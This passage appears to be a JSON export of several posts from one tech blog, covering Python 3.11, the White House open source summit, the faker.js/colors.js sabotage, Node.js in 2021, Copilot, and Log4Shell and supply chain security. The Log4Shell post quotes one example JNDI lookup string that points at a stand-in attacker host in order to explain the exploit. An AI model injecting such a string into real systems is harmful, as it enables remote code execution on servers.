can\u0026rsquo;t optimize a decades-old interpreter in weekends and spare time.\nWhat This Means for Python Developers # If you\u0026rsquo;re writing Python today, here\u0026rsquo;s what\u0026rsquo;s actionable:\nDon\u0026rsquo;t change your code for performance yet. The optimizations in 3.11 work best on idiomatic Python. Writing \u0026ldquo;clever\u0026rdquo; code to work around interpreter limitations often makes things worse when the optimizer improves. 
Write clean, straightforward Python and let the interpreter do its job.\nStart testing against 3.11 alpha. If you maintain a library, set up CI against 3.11 now. The sooner compatibility issues surface, the easier they are to fix. Most well-maintained packages should work without changes, but C extensions occasionally need updates.\nWatch the benchmark results. The pyperformance benchmark suite is the standard measure. Current results show impressive gains on compute-heavy benchmarks (spectral_norm is 50%+ faster) and modest gains on I/O-heavy code (where the interpreter speed matters less).\nKeep realistic expectations. Even with a 25% average speedup, Python is still going to be slower than Go, Rust, or Java for CPU-bound work. The goal isn\u0026rsquo;t to make Python competitive in raw performance — it\u0026rsquo;s to make Python fast enough that performance isn\u0026rsquo;t the reason you choose a different language.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and I\u0026rsquo;ve watched the \u0026ldquo;Python is too slow\u0026rdquo; debate play out for years. The pragmatic answer has always been that Python\u0026rsquo;s productivity advantages outweigh its performance costs for most workloads, and for the hot paths, you drop into C extensions, Cython, or NumPy.\nWhat excites me about Faster CPython is that it\u0026rsquo;s a credible plan to shrink that performance gap without sacrificing what makes Python great. The specializing interpreter is technically elegant — it works with Python\u0026rsquo;s dynamic nature rather than against it.\nThe 3.11 release is scheduled for October 2022, and based on what I\u0026rsquo;m seeing in the alphas, it\u0026rsquo;s going to be one of the most significant CPython releases in years. Not for new syntax or features, but for making existing code run faster. 
Sometimes the most impactful improvements are the ones that require zero changes from the user.\nThis is part of my Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"20 January 2022","externalUrl":null,"permalink":"/posts/220120-faster-cpython-311-performance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The Faster CPython project, backed by Microsoft and led by Guido van Rossum, is shipping real performance gains in Python 3.11 alpha.","title":"Faster CPython — The Ambitious Plan to Double Python's Speed","type":"posts"},{"content":"Today the White House hosted a summit on open source software security, bringing together executives from Google, Apple, Microsoft, Amazon, IBM, Meta, and several other major technology companies alongside government agencies. The catalyst, of course, was Log4Shell — the critical vulnerability in Apache Log4j that sent every security team scrambling last month. But the conversation went far deeper than one CVE.\nWhen the National Security Council invites you to discuss logging libraries, you know the landscape has fundamentally shifted.\nWhat Was Actually on the Table # According to statements from the White House, the discussion centered on three key areas: preventing security defects in open source code, improving the process for finding and fixing vulnerabilities, and reducing the time it takes to distribute and implement patches.\nThe subtext here is important. The US government has realized that critical national infrastructure depends on software maintained by volunteers. The same problem we\u0026rsquo;ve been discussing in open source circles for years has now become a matter of national security policy. 
Log4j made this impossible to ignore — the library is embedded in everything from enterprise Java applications to Minecraft servers, and the volunteer maintainers who had to drop everything during the holidays to patch it don\u0026rsquo;t work for any of the companies profiting from their code.\nGoogle\u0026rsquo;s Kent Walker proposed creating a new organization to serve as a marketplace for open source maintenance, essentially matching volunteers with critical projects that need support. The company also suggested designating certain open source projects as \u0026ldquo;critical infrastructure\u0026rdquo; with corresponding security requirements and funding.\nThe SBOM Push # One of the most concrete outcomes appears to be momentum around Software Bills of Materials (SBOMs). The executive order on cybersecurity from May 2021 already mandated SBOMs for software sold to the federal government, but adoption across the broader industry has been slow.\nFor those unfamiliar, an SBOM is essentially an ingredients list for software — a machine-readable inventory of every component, library, and dependency in your application. When the next Log4Shell happens (and it will), an SBOM lets you answer the question \u0026ldquo;are we affected?\u0026rdquo; in minutes rather than days.\nThe two main formats gaining traction are SPDX (backed by the Linux Foundation) and CycloneDX (from OWASP). If you\u0026rsquo;re not generating SBOMs for your builds yet, I\u0026rsquo;d strongly recommend looking into it now. Tools like syft from Anchore can generate them from container images, and most CI/CD platforms are adding native support.\nIn my experience, the hardest part isn\u0026rsquo;t generating the SBOM — it\u0026rsquo;s actually doing something useful with it once you have it. You need tooling to ingest, store, query, and alert on SBOM data. 
That ecosystem is still immature, but it\u0026rsquo;s developing fast.\nThe Funding Gap # Perhaps the most important discussion point was funding. The OpenSSF (Open Source Security Foundation) has been doing solid work since its founding in 2020, but its resources are modest relative to the scale of the problem. Several summit attendees reportedly discussed significantly increasing financial commitments.\nHere\u0026rsquo;s the math that should keep every CTO up at night: the Log4j vulnerability affected an estimated 35,000+ Java packages — roughly 8% of the Maven Central repository. The initial patch was developed by a handful of volunteers. The downstream impact on global commerce was measured in billions. Yet the project\u0026rsquo;s total annual funding was essentially zero.\nWe\u0026rsquo;re not just talking about Log4j here. The Census II study from the Linux Foundation identified hundreds of critical open source packages in similar situations — widely deployed, under-maintained, and one bad commit away from a global incident.\nThe faker.js incident from last week (where a maintainer deliberately corrupted his own packages) is another data point in this trend. Whether it\u0026rsquo;s burnout, malice, or negligence, the single points of failure in our dependency chains are real.\nWhat Actually Changes # I\u0026rsquo;ve been through enough government-industry summits to be cautiously skeptical about outcomes. The federal SBOM mandate is real and will drive adoption. The increased attention to open source security is genuinely positive. But structural problems require structural solutions.\nWhat I\u0026rsquo;d like to see:\nShort term: Major tech companies establishing dedicated open source security teams that contribute engineering resources (not just money) to critical projects. 
Google\u0026rsquo;s proposal for an \u0026ldquo;Open Source Maintenance Crew\u0026rdquo; is a step in this direction.\nMedium term: Industry-standard security baselines for open source projects that receive significant usage. Not bureaucratic certification schemes, but practical requirements like two-factor authentication for maintainers, signed releases, and automated dependency scanning.\nLong term: A sustainable economic model where the companies that profit most from open source contribute proportionally to its maintenance. This is the hardest problem and the one most likely to be kicked down the road.\nMy Take # I\u0026rsquo;m genuinely encouraged that this conversation is happening at the highest levels of government. For years, the open source sustainability problem was treated as a niche concern. Log4Shell made it a national security issue, and that kind of visibility creates real pressure for change.\nBut I\u0026rsquo;ll believe it when I see the funding numbers. Summits are easy. Multi-year commitments to fund unglamorous maintenance work on critical infrastructure are hard. The test isn\u0026rsquo;t what gets announced in the press release — it\u0026rsquo;s whether, a year from now, the maintainers of critical open source projects have the support they need to do their work sustainably and securely.\nIf you maintain open source software, pay attention to the OpenSSF\u0026rsquo;s initiatives in the coming months. If you consume open source software (and you do), start generating SBOMs and auditing your supply chain. 
The window between \u0026ldquo;this is someone else\u0026rsquo;s problem\u0026rdquo; and \u0026ldquo;this is a compliance requirement\u0026rdquo; is closing fast.\nThis is part of my Security in Practice series, exploring real-world security challenges and how to address them pragmatically.\n","date":"13 January 2022","externalUrl":null,"permalink":"/posts/220113-white-house-open-source-security-summit/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The White House convened tech leaders to address open source security after Log4Shell. Here’s what was discussed and what it means for developers.","title":"The White House Open Source Summit — When Log4j Gets Political","type":"posts"},{"content":"If you woke up this week to garbled terminal output from your Node.js applications, you weren\u0026rsquo;t alone. Marak Squires, the maintainer of the hugely popular faker and colors npm packages, deliberately pushed destructive updates to both libraries. The colors package now prints an infinite loop of gibberish characters, while faker was effectively gutted. Between them, these packages see tens of millions of weekly downloads. The fallout has been immediate and widespread. This incident exemplifies the supply chain vulnerabilities that the SolarWinds attack had demonstrated at a much larger scale months earlier.\nThis isn\u0026rsquo;t a hack. This isn\u0026rsquo;t a supply chain attack from an external actor. This is a maintainer who decided to torch his own projects. And that distinction matters enormously.\nWhat Actually Happened # On January 4th, Marak pushed version 6.6.6 of faker to npm — a version that replaced the library\u0026rsquo;s functionality with a brief message. 
Around the same time, colors version 1.4.1 introduced an infinite loop that writes garbage to the console using a fake \u0026ldquo;LIBERTY LIBERTY LIBERTY\u0026rdquo; American flag ASCII art sequence.\nThe colors package is a dependency of thousands of projects, including well-known tools. AWS CDK users were among the first to notice, as their CLI output suddenly became unusable. GitHub quickly locked Marak\u0026rsquo;s account and npm reverted the malicious versions, but the damage to trust was already done.\nLooking at Marak\u0026rsquo;s GitHub history, the warning signs were there. Back in November 2020, he opened an issue titled \u0026ldquo;No more free work from Marak\u0026rdquo; on the faker repository, expressing frustration that Fortune 500 companies were profiting from his unpaid labor. The issue linked to a blog post essentially invoicing major corporations for his work.\nThe Sustainability Problem Nobody Wants to Solve # I\u0026rsquo;ve been in this industry long enough to remember when open source was a philosophical movement, not an infrastructure dependency. The uncomfortable truth is that our entire modern software ecosystem runs on code maintained by people who often receive nothing for it. We\u0026rsquo;ve built a global digital economy on volunteer labor and then act surprised when volunteers burn out — or burn it down.\nThe Core Infrastructure Initiative, launched after Heartbleed in 2014, was supposed to address this. GitHub Sponsors exists. The OpenSSF is doing real work. But the fundamental economic model remains broken: companies extract billions in value from packages maintained by individuals who can barely pay rent. These systemic issues would be formally addressed by the White House just weeks later when it convened industry leaders to discuss open source security.\nThat said — and I want to be clear about this — deliberately corrupting packages that millions of developers depend on is not protest. It\u0026rsquo;s sabotage. 
There are real people whose systems broke this week. Small companies, individual developers, non-profits. They didn\u0026rsquo;t deserve to have their Thursday ruined because of a dispute with Fortune 500 companies.\nWhat This Means for Your Dependencies # If you\u0026rsquo;re running any Node.js project in production, you should already have done the following:\nPin your dependency versions. If you\u0026rsquo;re using ^ or ~ in your package.json for anything that touches production, stop. Use exact versions or lockfiles religiously.\nAudit your dependency tree. Run npm audit and actually look at what you\u0026rsquo;re pulling in. Most projects have hundreds of transitive dependencies they\u0026rsquo;ve never examined.\nConsider vendoring critical dependencies. For packages that are genuinely critical to your application, keeping a local copy isn\u0026rsquo;t paranoia — it\u0026rsquo;s engineering.\nSet up a private registry or proxy. Tools like Verdaccio or commercial offerings from JFrog and Sonatype let you cache and vet packages before they hit your CI/CD pipeline.\nThe npm ecosystem has over 1.8 million packages. The average Node.js project pulls in hundreds of transitive dependencies. Each one is a trust relationship with a maintainer you\u0026rsquo;ve probably never met. That model works remarkably well most of the time, but when it fails, it fails spectacularly.\nThe Governance Question # What\u0026rsquo;s interesting to me is the governance angle. npm (now owned by GitHub, which is owned by Microsoft) acted quickly to revert the packages and lock the account. But this raises questions about who really \u0026ldquo;owns\u0026rdquo; an open source package once it\u0026rsquo;s published to a registry. Similar governance and security concerns would resurface in later supply chain incidents as the ecosystem continued to mature.\nMarak created this code. He maintained it for years. Does the registry have the right to override his publishing decisions? 
Most developers would instinctively say yes — the ecosystem has to be protected. But that instinct should make us uncomfortable. If a registry can override a maintainer, then the maintainer doesn\u0026rsquo;t truly control their own project. That\u0026rsquo;s a governance model we should be explicit about rather than one we discover ad-hoc during incidents.\nThe npm dispute resolution policy was never designed for this scenario. It handles naming disputes, not maintainer sabotage. We need better frameworks.\nMy Take # I have sympathy for maintainer burnout. I\u0026rsquo;ve contributed to open source projects for decades, and the expectation that you\u0026rsquo;ll provide free support to companies making millions from your work is genuinely corrosive. But there\u0026rsquo;s a line between advocating for fair compensation and deliberately breaking production systems worldwide.\nThe real lesson here isn\u0026rsquo;t about one angry developer. It\u0026rsquo;s about an ecosystem that\u0026rsquo;s structurally fragile. We need better funding models, better governance, and better tooling to protect against this class of risk — whether the source is a burned-out maintainer, a compromised account, or a nation-state actor.\nLock your dependencies. Audit your supply chain. And maybe consider sponsoring the maintainers whose code your business depends on. 
It\u0026rsquo;s cheaper than the alternative.\nThis is part of my ongoing Developer Landscape series, tracking the trends and shifts that shape how we build software.\n","date":"6 January 2022","externalUrl":null,"permalink":"/posts/220106-faker-colors-open-source-sabotage/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A single developer deliberately corrupted two widely-used npm packages, exposing the fragility of the open source supply chain.","title":"When a Maintainer Burns It Down — The faker.js and colors.js Incident","type":"posts"},{"content":"As 2021 wraps up, I want to reflect on a platform that\u0026rsquo;s been central to my work for years: Node.js. This wasn\u0026rsquo;t a year of dramatic headlines for Node — no major controversies, no existential threats. Instead, it was a year of steady, purposeful maturation. And honestly, for a technology platform that powers millions of production applications, boring progress is exactly what you want.\nNode 16 Goes LTS # The headline event was Node.js 16 entering Long Term Support in October, becoming the recommended version for production use. Node 16 brought several features that have been cooking for a while:\nV8 9.4 under the hood means better performance and newer JavaScript features. Array.prototype.at(), Object.hasOwn(), and RegExp match indices are small quality-of-life improvements, but they add up.\nStable Timers Promises API — you can now import { setTimeout } from 'timers/promises' and await setTimeout(1000) instead of wrapping callbacks in Promises. It\u0026rsquo;s a tiny thing, but I use timers constantly in test code and integration scripts, and this reads so much better.\nnpm 8 ships with Node 16, bringing workspaces that are actually usable. 
If you\u0026rsquo;re managing a monorepo, npm workspaces are now a viable alternative to Yarn workspaces or Lerna for many use cases.\nMeanwhile, Node 17 came out in October as the Current release with some interesting experimental features. The one I\u0026rsquo;m watching most closely is the built-in test runner.\nThe Built-in Test Runner # Node 17 shipped with an experimental node:test module, and while it\u0026rsquo;s not production-ready yet, it signals an important direction. For years, testing in Node has required a third-party framework — Mocha, Jest, Ava, tap. Each has its own quirks, configuration, and ecosystem.\nHaving a built-in test runner means that simple projects don\u0026rsquo;t need a testing dependency at all. The API is clean:\nimport test from \u0026#39;node:test\u0026#39;; import assert from \u0026#39;node:assert\u0026#39;; test(\u0026#39;basic arithmetic\u0026#39;, (t) =\u0026gt; { assert.strictEqual(1 + 1, 2); }); test(\u0026#39;async operation\u0026#39;, async (t) =\u0026gt; { const result = await fetchData(); assert.ok(result.length \u0026gt; 0); }); Will this replace Jest for complex applications? Probably not anytime soon — Jest\u0026rsquo;s mocking system, snapshot testing, and rich ecosystem are hard to replicate. But for libraries, small services, and quick scripts, having a zero-dependency test option is valuable. I\u0026rsquo;ve already started using it for utility libraries where adding Jest felt like overkill.\nThe TypeScript Migration Continues # One of the most notable trends in the Node.js ecosystem this year has been the continued migration toward TypeScript. 
The State of JS 2021 survey data isn\u0026rsquo;t fully in yet, but from what I\u0026rsquo;ve seen in the ecosystem, TypeScript adoption in Node.js projects has crossed a tipping point.\nMajor frameworks have gone TypeScript-first: NestJS continues to gain traction as the \u0026ldquo;enterprise\u0026rdquo; Node.js framework, and tRPC emerged this year as an interesting approach to end-to-end type-safe APIs. Even Express, the eternal incumbent, sees most new tutorial content written in TypeScript.\nWhat\u0026rsquo;s interesting is watching how this shifts the Node.js development experience. TypeScript adds a compilation step, which traditionally goes against Node\u0026rsquo;s \u0026ldquo;edit and run\u0026rdquo; philosophy. Tools like tsx and ts-node smooth over this friction, but there\u0026rsquo;s still an ongoing tension between TypeScript\u0026rsquo;s safety benefits and the added complexity.\nIn my own projects, I\u0026rsquo;ve fully committed to TypeScript for anything beyond quick scripts. The productivity gain from catching type errors at compile time — especially in large codebases with multiple contributors — far outweighs the setup overhead.\nESM: Almost There, Not Quite # ECMAScript Modules (ESM) support in Node.js continued its slow march toward becoming the default in 2021. Node 16 improved ESM support, and more packages are shipping ESM builds alongside CommonJS. But the migration is messy.\nThe fundamental tension is that CommonJS and ESM have different semantics — CJS is synchronous and uses require(), ESM is asynchronous and uses import. You can import CJS from ESM, but you can\u0026rsquo;t easily require ESM from CJS. 
This means the transition has to work its way through the dependency tree one package at a time, and any package that goes ESM-only risks breaking downstream consumers that haven\u0026rsquo;t migrated yet.\nSome prominent packages made the leap this year — notably the got HTTP client and several packages in Sindre Sorhus\u0026rsquo;s ecosystem went ESM-only. This caused genuine pain for many developers and sparked heated debate about whether going ESM-only is responsible or reckless.\nMy take: ESM is the future, and the migration is worth it. But going ESM-only in a library right now is premature for most packages. Dual publishing (CJS + ESM) is more work but shows respect for your downstream consumers. We\u0026rsquo;ll get there, but forcing the transition creates unnecessary friction.\nDeno and the Competition # I\u0026rsquo;d be remiss not to mention Deno, Ryan Dahl\u0026rsquo;s successor project to Node.js. Deno had a productive 2021 — the Deno Deploy edge computing platform launched, and the runtime continued to improve. But in terms of production adoption, Deno remains a niche player.\nThat said, Deno is influencing Node.js in positive ways. Node\u0026rsquo;s built-in test runner, improved permission considerations, and the push toward web-standard APIs are all partially inspired by Deno\u0026rsquo;s design decisions. Competition in the JavaScript runtime space is healthy.\nMy Take # Node.js in 2021 reminds me of where Java was about a decade ago — mature, widely deployed, and evolving steadily rather than dramatically. That\u0026rsquo;s not a bad thing. 
When your platform runs a significant chunk of the internet\u0026rsquo;s backend services, stability and incremental improvement are features, not bugs.\nFor 2022, I\u0026rsquo;m most interested in three things: the built-in test runner reaching stability, further ESM adoption reducing the dual-module headaches, and whether the performance work in Node 18 narrows the gap with alternatives like Deno and Bun (the new Zig-based JavaScript runtime that\u0026rsquo;s been generating buzz).\nNode.js isn\u0026rsquo;t the exciting new thing anymore. It\u0026rsquo;s the reliable thing. After thirty years in this industry, I\u0026rsquo;ve learned to value reliable over exciting every single time.\nHere\u0026rsquo;s to another year of boring, productive progress.\n","date":"30 December 2021","externalUrl":null,"permalink":"/posts/211230-nodejs-2021-year-in-review/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js had a year of steady progress in 2021: Node 16 went LTS, the test runner landed, and the ecosystem continued its TypeScript migration.","title":"Node.js in 2021 — A Year of Quiet Maturation","type":"posts"},{"content":"It\u0026rsquo;s been about six months since GitHub launched the Copilot technical preview back in June, and I\u0026rsquo;ve been using it daily since getting access in July. With the holiday break approaching and some quieter days ahead, it feels like the right time to share an honest assessment of what AI-assisted coding actually looks like in practice — beyond the flashy demos and Twitter threads.\nThe short version: it\u0026rsquo;s genuinely useful, occasionally brilliant, frequently wrong, and has changed how I think about writing code in ways I didn\u0026rsquo;t expect.\nWhat It Actually Does Well # Copilot excels at boilerplate. 
The kind of code you\u0026rsquo;ve written a hundred times — setting up an Express route handler, writing a database query, implementing a standard sorting function, building a React component with props. This is where Copilot saves me the most time, and it\u0026rsquo;s not glamorous but it\u0026rsquo;s real.\nI\u0026rsquo;ve also been impressed by its ability to infer intent from comments and function names. Writing a comment like // Parse CSV file and return array of objects with headers as keys and having Copilot generate a reasonable implementation on the first try is genuinely delightful. It\u0026rsquo;s not always perfect, but it\u0026rsquo;s usually close enough that editing is faster than writing from scratch.\nThe tool is particularly strong with Python and JavaScript/TypeScript — no surprise given the training data composition. For these languages, I\u0026rsquo;d estimate it provides a useful suggestion about 40-50% of the time. For less common languages or specialized domains, that drops significantly.\nWhere Copilot truly shines is in test writing. Describe a function and its edge cases, and it\u0026rsquo;ll generate test scaffolding that covers most of what you\u0026rsquo;d write manually. I\u0026rsquo;ve found this to be the single biggest productivity gain — not because writing tests is hard, but because the mechanical aspect of setting up test cases is tedious enough that developers often skip edge cases.\nWhere It Falls Down # Let me be equally honest about the problems. Copilot confidently generates code that looks right but is subtly wrong. I\u0026rsquo;ve caught it producing SQL queries with injection vulnerabilities, generating regex patterns that miss edge cases, and writing async code with race conditions. The code looks plausible, which makes it more dangerous than obviously broken code.\nThis is my biggest concern: Copilot lowers the barrier for producing code, but it doesn\u0026rsquo;t lower the barrier for reviewing code. 
A junior developer who accepts Copilot suggestions without deep understanding will ship bugs that a junior developer writing code manually might not — because the manual developer at least had to think through the logic step by step.\nI\u0026rsquo;ve also noticed that Copilot sometimes generates code that works but violates project conventions. It doesn\u0026rsquo;t understand your team\u0026rsquo;s patterns, your error handling strategy, or your abstraction boundaries. It generates statistically likely code, which means it tends toward common patterns from its training data rather than project-specific patterns.\nAnd then there\u0026rsquo;s the licensing question. Copilot was trained on public GitHub repositories, and there are legitimate concerns about whether it reproduces copyrighted code. I\u0026rsquo;ve seen it generate code blocks that look suspiciously like they were lifted from specific open source projects, sometimes with license-incompatible implications. The legal situation is murky, and I\u0026rsquo;d advise anyone using Copilot in a commercial context to be aware of this risk.\nHow It Changed My Workflow # The most interesting effect has been psychological. I now think about coding differently — I write more descriptive comments before implementing, because I know Copilot will use them as context. I name functions more carefully. I structure my code in smaller, more self-contained units.\nIn other words, Copilot has made me write code that\u0026rsquo;s more readable for humans because I\u0026rsquo;m optimizing for an AI that benefits from clear intent signals. That\u0026rsquo;s an unexpected but welcome side effect.\nI\u0026rsquo;ve also started using Copilot as a rubber duck. When I\u0026rsquo;m stuck on a problem, I\u0026rsquo;ll write a detailed comment describing what I need, see what Copilot suggests, and use that as a starting point for my thinking. Later AI-assisted development built on these foundational interactions. 
Even if I throw away the suggestion entirely, it\u0026rsquo;s faster than searching Stack Overflow for the specific pattern I need.\nThe Broader Implications # Copilot is clearly a preview of where software development is heading. The underlying technology — OpenAI\u0026rsquo;s Codex model — is improving rapidly, and I\u0026rsquo;d expect the suggestion quality to get meaningfully better over the next year or two. The evolution through Copilot agent mode validated this prediction.\nBut I think the framing of \u0026ldquo;AI replacing developers\u0026rdquo; misses the point entirely. Copilot doesn\u0026rsquo;t replace developers — it replaces the mechanical aspects of coding. The rise of agent systems showed how this augmentation evolved. The hard parts of software engineering — understanding requirements, designing systems, making architectural decisions, debugging production issues, communicating with stakeholders — none of that is touched by Copilot.\nIf anything, tools like Copilot make those higher-level skills more important. When generating code becomes cheap, the value shifts to knowing what code to generate and why. AI-assisted testing demonstrates how judgment remains critical. Experienced developers who understand systems thinking, performance implications, and security considerations become more valuable, not less.\nMy Take # After six months, I\u0026rsquo;m keeping Copilot in my editor. It saves me maybe 30-45 minutes per day on a typical coding day, mostly through boilerplate reduction and test scaffolding. That\u0026rsquo;s not transformative, but it\u0026rsquo;s meaningful.\nMy recommendation for other developers: try it with healthy skepticism. Treat every suggestion as a draft from a junior developer — potentially useful, definitely needs review. Don\u0026rsquo;t let it write security-sensitive code. 
Do use it for tests, boilerplate, and as a thinking tool.\nWe\u0026rsquo;re in the early days of AI-assisted development, and Copilot is a compelling first step. It\u0026rsquo;s not the revolution some claim, but it\u0026rsquo;s not a gimmick either. It\u0026rsquo;s a genuinely useful tool that happens to also be a glimpse of where our profession is heading.\nNow if you\u0026rsquo;ll excuse me, I have some holiday coding projects to get to — with my AI pair programmer along for the ride.\n","date":"23 December 2021","externalUrl":null,"permalink":"/posts/211223-six-months-with-github-copilot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"After six months in the GitHub Copilot technical preview, here’s what AI pair programming actually looks like in day-to-day development work.","title":"Six Months with GitHub Copilot — An Honest Assessment","type":"posts"},{"content":"It\u0026rsquo;s been a week since Log4Shell exploded onto the scene, and if anything, the situation has gotten more complex rather than less. The initial patch in Log4j 2.15.0 turned out to be incomplete — a new CVE-2021-45046 was issued, and Apache rushed out version 2.16.0 which disables JNDI entirely by default. As I write this, there are reports of yet another issue being investigated. Teams that patched last weekend are patching again today.\nBut I don\u0026rsquo;t want to rehash the vulnerability details. Instead, I want to talk about the systemic problem that Log4Shell has made impossible to ignore: software supply chain security.\nThe Dependency Iceberg # Here\u0026rsquo;s a number that should keep every CTO awake at night: the average enterprise Java application contains between 100 and 400 transitive dependencies. Your developers chose maybe 20 of those explicitly. The other 80-380 came along for the ride, pulled in by the libraries you actually wanted.\nLog4j was lurking in those shadows for millions of applications. 
Some organizations are still discovering instances of Log4j in their infrastructure a week later — in legacy applications, in embedded systems, in commercial off-the-shelf software where they don\u0026rsquo;t even have access to the source code.\nThis isn\u0026rsquo;t a Java problem. It\u0026rsquo;s a software engineering problem. The npm ecosystem, Python\u0026rsquo;s PyPI, Ruby gems — they all have the same deep dependency graphs. The reason Java got hit this time is that Log4j happens to be the most popular logging library in one of the most widely deployed enterprise language ecosystems. Next time it could be a Python package or a Node.js module.\nSBOMs: The Ingredient Label We Need # The concept of a Software Bill of Materials — an SBOM — has been gaining traction this year, partly driven by the Executive Order on Improving the Nation\u0026rsquo;s Cybersecurity issued back in May. The idea is simple: every piece of software should come with a machine-readable list of every component it contains, like a nutritional label for code.\nIf every application had an SBOM, responding to Log4Shell would have been a lookup query instead of a week-long archaeological expedition through dependency trees and Docker images. \u0026ldquo;Show me everything that contains Log4j 2.x\u0026rdquo; should be a 30-second operation, not a multi-day audit.\nTwo standards are emerging: SPDX from the Linux Foundation and CycloneDX from OWASP. Both can express software component inventories in machine-readable formats. Tools like syft from Anchore can generate SBOMs from container images, and Maven and Gradle plugins exist for Java projects.\nThe challenge isn\u0026rsquo;t generating SBOMs — it\u0026rsquo;s making them a standard part of the software delivery pipeline. Every CI/CD build should produce an SBOM alongside the artifact. Every deployment should register its SBOM in a central inventory. 
Every vulnerability disclosure should trigger an automated cross-reference against that inventory.\nDependency Pinning and Verification # SBOMs are the inventory side of the problem. The integrity side is equally important. Supply chain security frameworks like SLSA would emerge to standardize this discipline. How do you know that the version of Log4j you downloaded from Maven Central is actually the code that the Apache team published?\nPackage signing and verification have been inconsistent across ecosystems. Maven Central has PGP signatures, but how many build pipelines actually verify them? npm introduced npm audit signatures only recently. Python\u0026rsquo;s PyPI has been working on adding proper signing support.\nI\u0026rsquo;ve been advocating for dependency pinning with hash verification in my projects for years — specifying not just the version but the exact SHA-256 hash of every dependency. npm security lessons reinforced these practices years later. It\u0026rsquo;s more work to maintain, but it means you can\u0026rsquo;t accidentally pull in a tampered package. Tools like Gradle\u0026rsquo;s dependency verification make this feasible.\nThe Maintainer Problem # The broader challenges of open source maintainer burnout would continue to complicate supply chain security.\nThere\u0026rsquo;s another dimension to this that doesn\u0026rsquo;t get enough attention: the human side. Log4j is maintained by a small team of volunteers. They\u0026rsquo;ve been working around the clock for a week to ship patches for a library that\u0026rsquo;s used by virtually every Fortune 500 company. Most of those companies have never contributed a dollar to Log4j\u0026rsquo;s maintenance.\nThis is the open source sustainability crisis in stark relief. We build trillion-dollar industries on top of software maintained by people in their spare time, and then we act surprised when a critical vulnerability slips through. 
The xkcd comic about the Nebraska problem has never been more relevant.\nIf your organization depends on Log4j — and it almost certainly does — consider this a wake-up call to invest in the open source projects you depend on. That can mean direct funding through platforms like GitHub Sponsors or Tidelift, contributing code reviews, or at minimum running and reporting results from security scanners.\nWhat I\u0026rsquo;m Implementing This Week # I\u0026rsquo;m not just writing about this — I\u0026rsquo;m acting on it. Here\u0026rsquo;s what I\u0026rsquo;m rolling out across my projects:\nSBOM generation in CI/CD: Every build now produces a CycloneDX SBOM alongside the artifact. Automated dependency scanning: Integrating Grype into the pipeline to check SBOMs against known vulnerabilities on every build. Dependency hash verification: Enabling Gradle\u0026rsquo;s dependency verification for all Java projects. Quarterly dependency audits: Scheduled reviews of the full dependency tree, not just direct dependencies. My Take # Log4Shell is a watershed moment for our industry. Not because the vulnerability itself is unique — it\u0026rsquo;s a severe RCE, but we\u0026rsquo;ve had those before. It\u0026rsquo;s a watershed because it exposed how utterly unprepared most organizations are to answer a simple question: \u0026ldquo;Are we affected?\u0026rdquo;\nThe fact that the answer took days or weeks instead of minutes is a systemic failure. We\u0026rsquo;ve spent two decades building increasingly complex dependency trees without building the tooling and processes to manage them safely.\nI genuinely hope this is the event that makes SBOMs and supply chain security mainstream. Not as a compliance checkbox, but as a fundamental engineering practice. The executive order was a nudge. Log4Shell is a shove. 
Let\u0026rsquo;s not wait for whatever comes next to actually start taking this seriously.\nThe patches will settle, the incident reports will be filed, and the news cycle will move on. What matters is what we build into our processes before the next Log4Shell hits.\n","date":"16 December 2021","externalUrl":null,"permalink":"/posts/211216-software-supply-chain-security-after-log4j/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A week after Log4Shell, the patching chaos continues. But the bigger lesson is about software supply chain security and why we need SBOMs now.","title":"After Log4Shell — Software Supply Chain Security Can't Wait","type":"posts"},{"content":"If you\u0026rsquo;re a developer or ops engineer reading this today, there\u0026rsquo;s a good chance you\u0026rsquo;ve already been pulled into an emergency response. A critical zero-day vulnerability in Apache Log4j, tracked as CVE-2021-44228 and nicknamed \u0026ldquo;Log4Shell,\u0026rdquo; was publicly disclosed today and it\u0026rsquo;s as bad as it sounds. We\u0026rsquo;re talking about a remote code execution vulnerability that scores a perfect 10.0 on the CVSS scale, affecting one of the most widely-used logging libraries in the Java ecosystem.\nI\u0026rsquo;ve been doing this for three decades, and I can count on one hand the vulnerabilities that feel this significant. This is one of them. The broader supply chain security implications emerged as a result.\nWhat\u0026rsquo;s Actually Happening # The vulnerability exploits Log4j\u0026rsquo;s message lookup substitution feature. Specifically, when Log4j processes a log message containing a JNDI (Java Naming and Directory Interface) lookup string like ${jndi:ldap://attacker.com/exploit}, it will actually resolve that URL and potentially execute arbitrary code from a remote server.\nLet that sink in. 
If an attacker can get a malicious string into any log message processed by a vulnerable Log4j instance — through a user-agent header, a form field, a chat message, literally anything that gets logged — they can achieve remote code execution on your server.\nThe affected versions are Log4j 2.0-beta9 through 2.14.1. Apache has released version 2.15.0 with a fix, but the scope of exposure is staggering.\nWhy This Is Different # Log4j isn\u0026rsquo;t just used by a few applications. It\u0026rsquo;s used by everything in the Java world. Supply chain security lessons built on this incident. Apache Struts, Apache Solr, Apache Druid, ElasticSearch, Minecraft servers, and countless enterprise applications all use Log4j. Many teams don\u0026rsquo;t even know they\u0026rsquo;re using it because it\u0026rsquo;s a transitive dependency — your application depends on a library that depends on another library that depends on Log4j.\nI just finished auditing one of my client projects. We found Log4j buried three levels deep in the dependency tree through a logging bridge we\u0026rsquo;d forgotten about. This is going to be the story for thousands of organizations over the coming days: discovering Log4j in places they never knew it existed.\nThe other factor that makes this so severe is the trivial exploitability. You don\u0026rsquo;t need specialized tools or deep technical knowledge. Similar incidents later highlighted this vulnerability class. The proof-of-concept fits in a tweet. Within hours of the disclosure, security researchers observed mass scanning activity across the internet looking for vulnerable servers.\nWhat to Do Right Now # If you\u0026rsquo;re running any Java-based application, here\u0026rsquo;s your action plan:\n1. Inventory your exposure. Check your dependency trees. Run mvn dependency:tree | grep log4j for Maven projects, or gradle dependencies | grep log4j for Gradle. 
